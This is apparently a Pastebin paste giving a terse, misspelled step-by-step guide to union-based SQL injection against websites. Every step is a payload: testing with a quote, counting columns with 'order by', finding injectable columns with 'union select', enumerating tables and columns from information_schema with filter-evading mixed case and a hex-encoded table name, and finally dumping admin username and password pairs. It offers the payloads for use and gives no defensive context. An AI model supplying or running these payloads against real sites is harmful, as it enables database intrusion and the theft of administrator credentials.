Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- first to check the site if it vulnerble sql
- use the code '
- step 1:
- finding the numbers of columns
- +order+by+100--
- ++++++++++++++++++++++++++++++
- step 2:
- finding the vulnerble columns
- +union+select+
- Note: but before the nunber this -
- te get version
- version() or vv()
- to get the database
- database()
- ----------------------------------
- step3:
- finding #table#
- (select+group_concat(table_name)+froM+InfORmaTion_scHema.tAblES)
- =================================
- step4
- finding #columns#
- (select+group_concat(column_name)
- +froM+InfORmaTion_scHema.cOlumnS+WheRe+tAblE_naMe=0x61646d696e5f61636570)
- admin_acep+0x61646d696e5f61636570
- -------------------------------------
- finding #Data#
- (select+group_concat(username,0x3a,password)+from+admin_acep)
- change colunn to the column names
- and the tablename change the name of the table
- use this code "0x3a" if you want more information
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement